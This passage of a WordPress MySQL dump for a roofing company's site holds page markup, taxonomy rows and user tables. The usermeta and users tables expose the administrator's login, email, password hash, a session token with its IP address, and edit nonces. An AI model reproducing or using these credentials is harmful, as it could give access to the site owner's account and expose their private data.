(100x84)\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003e6.9 KB ( 68.2% )\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003c/tbody\\u003e\\n\\t\\t\\t\\u003c/table\\u003e\\n\\t\\t\\u003c/div\\u003e\"}}],\"counterId\":\"a4a5d633-4d8b-45a7-b763-66922a89de8c\"} -->\n<style type=\"text/css\"> .wp-block-skt-blocks-image-boxes-block-item.block-id-a4a5d633-4d8b-45a7-b763-66922a89de8c .wp-block-skt-blocks-image-boxes-block-item__description, .wp-block-skt-blocks-image-boxes-block-item.block-id-a4a5d633-4d8b-45a7-b763-66922a89de8c .wp-block-skt-blocks-image-boxes-block-item__title {\n color: undefined; }\n .wp-block-skt-blocks-image-boxes-block-item.block-id-a4a5d633-4d8b-45a7-b763-66922a89de8c {\n background-color: undefined; color: undefined; text-align: center; border-radius:undefinedpx; justify-content:center !important; }\n .wp-block-skt-blocks-image-boxes-block-item.block-id-a4a5d633-4d8b-45a7-b763-66922a89de8c:hover .skt-blocks-add-image {\n background-image: linear-gradient(180deg,rgba(255, 255, 255, 0.7),rgba(255, 255, 255, 0.7)); border-radius:undefinedpx; }\n .wp-block-skt-blocks-image-boxes-block-item.block-id-a4a5d633-4d8b-45a7-b763-66922a89de8c:hover .skt-blocks-imagebox-image-wrap.front {\n transform: scale(undefined); }\n .wp-block-skt-blocks-image-boxes-block-item.block-id-a4a5d633-4d8b-45a7-b763-66922a89de8c .skt-blocks-imagebox-image-wrap.front img {\n width:fullpx !important; max-width:100%; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.wp-block-skt-blocks-image-boxes-block-item.block-id-a4a5d633-4d8b-45a7-b763-66922a89de8c .wp-block-skt-blocks-image-boxes-block-item__title {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 976px){\n\n.wp-block-skt-blocks-image-boxes-block-item.block-id-a4a5d633-4d8b-45a7-b763-66922a89de8c .wp-block-skt-blocks-image-boxes-block-item__title {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .wp-block-skt-blocks-image-boxes-block-item.block-id-a4a5d633-4d8b-45a7-b763-66922a89de8c .wp-block-skt-blocks-image-boxes-block-item__title {\n font-size: undefinedpx; }\n}\n</style><div class=\"has-text-align-center\"><div class=\"wp-block-skt-blocks-image-boxes-block__inner has-columns has-2-columns has-responsive-columns has-medium-gutter\"><a href=\"https://www.atlasroofing.com/roof-shingles\"><div class=\"wp-block-skt-blocks-image-boxes-block-item block-id-a4a5d633-4d8b-45a7-b763-66922a89de8c\" style=\"background-color:rgba(255, 255, 255, 0.7);background-image:linear-gradient(180deg,rgba(255, 255, 255, 0.7),rgba(255, 255, 255, 0.7)),url(https://cteisys.com/wp-content/uploads/2022/08/atlas-roof-shingles.jpg);padding-left:15px;padding-right:15px;padding-bottom:15px;padding-top:15px;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-add-image\"></div><h3 class=\"wp-block-skt-blocks-image-boxes-block-item__title\">Atlas Shingles</h3><p class=\"wp-block-skt-blocks-image-boxes-block-item__description\">You’re Looking For<br>Protection You Deserve</p></div></a><a href=\"https://www.tamko.com/\"><div class=\"wp-block-skt-blocks-image-boxes-block-item block-id-a4a5d633-4d8b-45a7-b763-66922a89de8c\" style=\"background-color:rgba(255, 255, 255, 0.7);background-image:linear-gradient(180deg,rgba(255, 255, 255, 0.7),rgba(255, 255, 255, 0.7)),url(https://cteisys.com/wp-content/uploads/2022/08/tamco.jpg);padding-left:15px;padding-right:15px;padding-bottom:15px;padding-top:15px;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-add-image\"></div><h3 class=\"wp-block-skt-blocks-image-boxes-block-item__title\">Tamko Products</h3><p class=\"wp-block-skt-blocks-image-boxes-block-item__description\">Shingles crafted with American Pride</p></div></a></div></div>\n<!-- /wp:skt-blocks/image-boxes-block -->\n\n<!-- wp:skt-blocks/image-boxes-block {\"imageboxesBlock\":[{\"hover_description\":\"At Owens Corning, we know it’s More Than Just a Roof®.\",\"title\":\"Owens Corning\",\"cta_url\":\"https://www.owenscorning.com/\",\"img_id\":485,\"img_url\":{\"id\":485,\"title\":\"owens corning\",\"filename\":\"owens-corning.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/owens-corning.jpg\",\"link\":\"https://cteisys.com/services/roofing-2/owens-corning/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"owens-corning\",\"status\":\"inherit\",\"uploadedTo\":263,\"date\":\"2022-08-24T23:19:47.000Z\",\"modified\":\"2022-08-24T23:19:47.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://cteisys.com/wp-includes/images/media/default.png\",\"dateFormatted\":\"August 24, 2022\",\"nonces\":{\"update\":\"94850a2d2b\",\"delete\":\"df3080b8b1\",\"edit\":\"721340def0\"},\"editLink\":\"https://cteisys.com/wp-admin/post.php?post=485\\u0026action=edit\",\"meta\":false,\"authorName\":\"newd\",\"authorLink\":\"https://cteisys.com/wp-admin/profile.php\",\"uploadedToTitle\":\"Roofing\",\"uploadedToLink\":\"https://cteisys.com/wp-admin/post.php?post=263\\u0026action=edit\",\"filesizeInBytes\":\"17085\",\"filesizeHumanReadable\":\"17 KB\",\"context\":\"\",\"height\":98,\"width\":297,\"orientation\":\"landscape\",\"sizes\":{\"thumbnail\":{\"height\":98,\"width\":150,\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/owens-corning-150x98.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/owens-corning.jpg\",\"height\":98,\"width\":297,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"},\"smush\":\"\\u003cp class=\\u0022smush-status\\u0022\\u003e2 images reduced by 14.0 KB (62.1%)\\u003cbr /\\u003eImage size: 16.7 KB\\u003c/p\\u003e\\u003cdiv class=\\u0022sui-smush-media smush-status-links\\u0022\\u003e\\u003ca href=\\u0022#\\u0022 class=\\u0022wp-smush-action smush-stats-details wp-smush-title sui-tooltip sui-tooltip-top-right\\u0022 data-tooltip=\\u0022Detailed stats for all the image sizes\\u0022\\u003eView Stats\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv id=\\u0022smush-stats-485\\u0022 class=\\u0022sui-smush-media smush-stats-wrapper hidden\\u0022\\u003e\\n\\t\\t\\t\\u003ctable class=\\u0022wp-smush-stats-holder\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cthead\\u003e\\n\\t\\t\\t\\t\\t\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003cth class=\\u0022smush-stats-header\\u0022\\u003eImage size\\u003c/th\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003cth class=\\u0022smush-stats-header\\u0022\\u003eSavings\\u003c/th\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\n\\t\\t\\t\\t\\u003c/thead\\u003e\\n\\t\\t\\t\\t\\u003ctbody\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eFULL\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\t\\u003ctd class=\\u0022smush-skipped\\u0022\\u003e\\u003ca href=\\u0022https://wpmudev.com/project/wp-smush-pro/?utm_source=smush\\u0026utm_medium=plugin\\u0026utm_campaign=smush_medialibrary_savings\\u0022 target=\\u0022_blank\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cspan class=\\u0022sui-tooltip sui-tooltip-left sui-tooltip-constrained sui-tooltip-top-right-mobile\\u0022 data-tooltip=\\u0022When you upload an image to WordPress it automatically creates 8 thumbnail sizes that are commonly used in your pages. WordPress also stores the original full-size image, but because these are not usually embedded on your site we don’t Smush them. Pro users can override this.\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cspan class=\\u0022sui-tag sui-tag-purple sui-tag-sm\\u0022\\u003ePRO\\u003c/span\\u003e\\u003c/span\\u003e\\u003c/a\\u003e\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eTHUMBNAIL \\u003cbr /\\u003e (150x98)\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003e7.1 KB ( 57.1% )\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eFOOTERTHUMB \\u003cbr /\\u003e (100x84)\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003e6.9 KB ( 68.2% )\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003c/tbody\\u003e\\n\\t\\t\\t\\u003c/table\\u003e\\n\\t\\t\\u003c/div\\u003e\"}},{\"cta_url\":\"https://dunriteroof.com/\",\"title\":\"Dunrite Roofing\",\"hover_description\":\"Quality and your satisfaction is our priority\",\"img_id\":362,\"img_url\":{\"id\":362,\"title\":\"favicon2\",\"filename\":\"favicon2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/favicon2.jpg\",\"link\":\"https://cteisys.com/favicon2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"favicon2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2022-08-22T17:14:26.000Z\",\"modified\":\"2022-08-22T17:14:26.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://cteisys.com/wp-includes/images/media/default.png\",\"dateFormatted\":\"August 22, 2022\",\"nonces\":{\"update\":\"64b740e15e\",\"delete\":\"e70c4e34ec\",\"edit\":\"b7e85ec790\"},\"editLink\":\"https://cteisys.com/wp-admin/post.php?post=362\\u0026action=edit\",\"meta\":false,\"authorName\":\"newd\",\"authorLink\":\"https://cteisys.com/wp-admin/profile.php\",\"filesizeInBytes\":8853,\"filesizeHumanReadable\":\"9 KB\",\"context\":\"\",\"height\":131,\"width\":171,\"orientation\":\"landscape\",\"sizes\":{\"thumbnail\":{\"height\":131,\"width\":150,\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/favicon2-150x131.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/favicon2.jpg\",\"height\":131,\"width\":171,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"},\"smush\":\"\\u003cp class=\\u0022smush-status\\u0022\\u003eNot processed\\u003c/p\\u003e\\u003cdiv class=\\u0022sui-smush-media smush-status-links\\u0022\\u003e\\u003ca href=\'#\' class=\'wp-smush-send\' data-id=\'362\'\\u003eSmush\\u003c/a\\u003e | \\u003ca href=\'#\' class=\'smush-ignore-image\' data-id=\'362\'\\u003eIgnore\\u003c/a\\u003e\\u003c/div\\u003e\"}}],\"counterId\":\"c659bd93-8e4d-4522-b707-d8e0e1f53f83\"} -->\n<style type=\"text/css\"> .wp-block-skt-blocks-image-boxes-block-item.block-id-c659bd93-8e4d-4522-b707-d8e0e1f53f83 .wp-block-skt-blocks-image-boxes-block-item__description, .wp-block-skt-blocks-image-boxes-block-item.block-id-c659bd93-8e4d-4522-b707-d8e0e1f53f83 .wp-block-skt-blocks-image-boxes-block-item__title {\n color: undefined; }\n .wp-block-skt-blocks-image-boxes-block-item.block-id-c659bd93-8e4d-4522-b707-d8e0e1f53f83 {\n background-color: undefined; color: undefined; text-align: center; border-radius:undefinedpx; justify-content:center !important; }\n .wp-block-skt-blocks-image-boxes-block-item.block-id-c659bd93-8e4d-4522-b707-d8e0e1f53f83:hover .skt-blocks-add-image {\n background-image: linear-gradient(180deg,rgba(255, 255, 255, 0.7),rgba(255, 255, 255, 0.7)); border-radius:undefinedpx; }\n .wp-block-skt-blocks-image-boxes-block-item.block-id-c659bd93-8e4d-4522-b707-d8e0e1f53f83:hover .skt-blocks-imagebox-image-wrap.front {\n transform: scale(undefined); }\n .wp-block-skt-blocks-image-boxes-block-item.block-id-c659bd93-8e4d-4522-b707-d8e0e1f53f83 .skt-blocks-imagebox-image-wrap.front img {\n width:fullpx !important; max-width:100%; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.wp-block-skt-blocks-image-boxes-block-item.block-id-c659bd93-8e4d-4522-b707-d8e0e1f53f83 .wp-block-skt-blocks-image-boxes-block-item__title {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 976px){\n\n.wp-block-skt-blocks-image-boxes-block-item.block-id-c659bd93-8e4d-4522-b707-d8e0e1f53f83 .wp-block-skt-blocks-image-boxes-block-item__title {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .wp-block-skt-blocks-image-boxes-block-item.block-id-c659bd93-8e4d-4522-b707-d8e0e1f53f83 .wp-block-skt-blocks-image-boxes-block-item__title {\n font-size: undefinedpx; }\n}\n</style><div class=\"has-text-align-center\"><div class=\"wp-block-skt-blocks-image-boxes-block__inner has-columns has-2-columns has-responsive-columns has-medium-gutter\"><a href=\"https://www.owenscorning.com/\"><div class=\"wp-block-skt-blocks-image-boxes-block-item block-id-c659bd93-8e4d-4522-b707-d8e0e1f53f83\" style=\"background-color:rgba(255, 255, 255, 0.7);background-image:linear-gradient(180deg,rgba(255, 255, 255, 0.7),rgba(255, 255, 255, 0.7)),url(https://cteisys.com/wp-content/uploads/2022/08/owens-corning.jpg);padding-left:15px;padding-right:15px;padding-bottom:15px;padding-top:15px;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-add-image\"></div><h3 class=\"wp-block-skt-blocks-image-boxes-block-item__title\">Owens Corning</h3><p class=\"wp-block-skt-blocks-image-boxes-block-item__description\">At Owens Corning, we know it’s More Than Just a Roof®.</p></div></a><a href=\"https://dunriteroof.com/\"><div class=\"wp-block-skt-blocks-image-boxes-block-item block-id-c659bd93-8e4d-4522-b707-d8e0e1f53f83\" style=\"background-color:rgba(255, 255, 255, 0.7);background-image:linear-gradient(180deg,rgba(255, 255, 255, 0.7),rgba(255, 255, 255, 0.7)),url(https://cteisys.com/wp-content/uploads/2022/08/favicon2.jpg);padding-left:15px;padding-right:15px;padding-bottom:15px;padding-top:15px;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-add-image\"></div><h3 class=\"wp-block-skt-blocks-image-boxes-block-item__title\">Dunrite Roofing</h3><p class=\"wp-block-skt-blocks-image-boxes-block-item__description\">Quality and your satisfaction is our priority</p></div></a></div></div>\n<!-- /wp:skt-blocks/image-boxes-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Roofing','','inherit','closed','closed','','263-revision-v1','','','2022-08-25 00:00:36','2022-08-25 00:00:36','',263,'https://cteisys.com/?p=495',0,'revision','',0),(506,1,'2022-10-20 18:08:26','0000-00-00 00:00:00','','Auto Draft','','auto-draft','','','','','','','2022-10-20 18:08:26','0000-00-00 00:00:00','',0,'https://cteisys.com/?p=506',0,'post','',0);
/*!40000 ALTER TABLE `wp0y_posts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp0y_smush_dir_images`
--

DROP TABLE IF EXISTS `wp0y_smush_dir_images`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp0y_smush_dir_images` (
  `id` mediumint(9) unsigned NOT NULL AUTO_INCREMENT,
  `path` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `path_hash` char(32) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `resize` varchar(55) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `lossy` varchar(55) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `error` varchar(55) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `image_size` int(10) unsigned DEFAULT NULL,
  `orig_size` int(10) unsigned DEFAULT NULL,
  `file_time` int(10) unsigned DEFAULT NULL,
  `last_scan` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
  `meta` text COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `path_hash` (`path_hash`),
  KEY `image_size` (`image_size`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp0y_smush_dir_images`
--

LOCK TABLES `wp0y_smush_dir_images` WRITE;
/*!40000 ALTER TABLE `wp0y_smush_dir_images` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp0y_smush_dir_images` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp0y_term_relationships`
--

DROP TABLE IF EXISTS `wp0y_term_relationships`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp0y_term_relationships` (
  `object_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_order` int(11) NOT NULL DEFAULT 0,
  PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp0y_term_relationships`
--

LOCK TABLES `wp0y_term_relationships` WRITE;
/*!40000 ALTER TABLE `wp0y_term_relationships` DISABLE KEYS */;
INSERT INTO `wp0y_term_relationships` VALUES (130,3,0),(144,3,0),(197,2,0),(198,2,0),(200,2,0),(201,2,0),(202,2,0),(232,4,0),(233,4,0),(234,4,0),(281,4,0),(282,4,0),(145,3,0),(147,3,0),(164,3,0),(165,3,0),(173,3,0),(174,3,0),(175,3,0),(193,3,0),(235,3,0),(236,3,0),(237,3,0),(331,3,0),(332,3,0),(367,5,0),(396,6,0),(397,6,0),(398,6,0),(399,6,0),(400,6,0),(403,6,0),(434,6,0);
/*!40000 ALTER TABLE `wp0y_term_relationships` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp0y_term_taxonomy`
--

DROP TABLE IF EXISTS `wp0y_term_taxonomy`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp0y_term_taxonomy` (
  `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `taxonomy` varchar(32) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `description` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_taxonomy_id`),
  UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  KEY `taxonomy` (`taxonomy`)
) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp0y_term_taxonomy`
--

LOCK TABLES `wp0y_term_taxonomy` WRITE;
/*!40000 ALTER TABLE `wp0y_term_taxonomy` DISABLE KEYS */;
INSERT INTO `wp0y_term_taxonomy` VALUES (1,1,'category','',0,0),(2,2,'nav_menu','',0,5),(3,3,'nav_menu','',0,15),(4,4,'nav_menu','',0,5),(5,5,'wp_theme','',0,1),(6,6,'nav_menu','',0,7);
/*!40000 ALTER TABLE `wp0y_term_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp0y_termmeta`
--

DROP TABLE IF EXISTS `wp0y_termmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp0y_termmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `term_id` (`term_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp0y_termmeta`
--

LOCK TABLES `wp0y_termmeta` WRITE;
/*!40000 ALTER TABLE `wp0y_termmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp0y_termmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp0y_terms`
--

DROP TABLE IF EXISTS `wp0y_terms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp0y_terms` (
  `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `slug` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_id`),
  KEY `slug` (`slug`(191)),
  KEY `name` (`name`(191))
) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp0y_terms`
--

LOCK TABLES `wp0y_terms` WRITE;
/*!40000 ALTER TABLE `wp0y_terms` DISABLE KEYS */;
INSERT INTO `wp0y_terms` VALUES (1,'Uncategorized','uncategorized',0),(2,'Footer','footer',0),(3,'Header','header',0),(4,'Services','services',0),(5,'skt-gb-renovation','skt-gb-renovation',0),(6,'Main','main',0);
/*!40000 ALTER TABLE `wp0y_terms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp0y_usermeta`
--

DROP TABLE IF EXISTS `wp0y_usermeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp0y_usermeta` (
  `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`umeta_id`),
  KEY `user_id` (`user_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM AUTO_INCREMENT=28 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp0y_usermeta`
--

LOCK TABLES `wp0y_usermeta` WRITE;
/*!40000 ALTER TABLE `wp0y_usermeta` DISABLE KEYS */;
INSERT INTO `wp0y_usermeta` VALUES (1,1,'nickname','newd'),(2,1,'first_name',''),(3,1,'last_name',''),(4,1,'description',''),(5,1,'rich_editing','true'),(6,1,'syntax_highlighting','true'),(7,1,'comment_shortcuts','false'),(8,1,'admin_color','fresh'),(9,1,'use_ssl','0'),(10,1,'show_admin_bar_front','true'),(11,1,'locale',''),(12,1,'wp0y_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(13,1,'wp0y_user_level','10'),(14,1,'dismissed_wp_pointers',''),(15,1,'show_welcome_panel','0'),(21,1,'session_tokens','a:1:{s:64:\"71a3fc1abf06f40fe582e8aa7d196b16e39b9151f6739361920b1258145cfc1c\";a:4:{s:10:\"expiration\";i:1666462102;s:2:\"ip\";s:14:\"130.44.228.161\";s:2:\"ua\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36\";s:5:\"login\";i:1666289302;}}'),(17,1,'jetpack_tracks_anon_id','jetpack:qHTxU16NYx/5hjntrWKsHNUW'),(18,1,'wp0y_dashboard_quick_press_last_post_id','506'),(19,1,'community-events-location','a:1:{s:2:\"ip\";s:12:\"130.44.228.0\";}'),(22,1,'wp0y_user-settings','libraryContent=browse&editor=tinymce'),(23,1,'wp0y_user-settings-time','1661360329'),(24,1,'nav_menu_recently_edited','6'),(25,1,'managenav-menuscolumnshidden','a:5:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";i:4;s:15:\"title-attribute\";}'),(26,1,'metaboxhidden_nav-menus','a:1:{i:0;s:12:\"add-post_tag\";}'),(27,1,'clast_log_view','a:0:{}');
/*!40000 ALTER TABLE `wp0y_usermeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp0y_users`
--

DROP TABLE IF EXISTS `wp0y_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp0y_users` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_login` varchar(60) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_pass` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_nicename` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_url` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT 0,
  `display_name` varchar(250) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`ID`),
  KEY `user_login_key` (`user_login`),
  KEY `user_nicename` (`user_nicename`),
  KEY `user_email` (`user_email`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp0y_users`
--

LOCK TABLES `wp0y_users` WRITE;
/*!40000 ALTER TABLE `wp0y_users` DISABLE KEYS */;
INSERT INTO `wp0y_users` VALUES (1,'newd','$P$BAYCTXV0vzJ.XxE5PRpmmsd7BDhEF60','newd','admin@cteisys.com','https://cteisys.com','2022-08-21 23:48:08','',0,'newd');
/*!40000 ALTER TABLE `wp0y_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp0y_wpforms_lite`
--

DROP TABLE IF EXISTS `wp0y_wpforms_lite`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp0y_wpforms_lite` (
  `rid` int(10) NOT NULL AUTO_INCREMENT,
  `start` bigint(20) NOT NULL,
  `end` bigint(20) NOT NULL,
  `status` tinyint(2) NOT NULL DEFAULT 1,
  `date` int(10) NOT NULL,
  PRIMARY KEY (`rid`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp0y_wpforms_lite`
--

LOCK TABLES `wp0y_wpforms_lite` WRITE;
/*!40000 ALTER TABLE `wp0y_wpforms_lite` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp0y_wpforms_lite` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2022-10-20 16:09:40
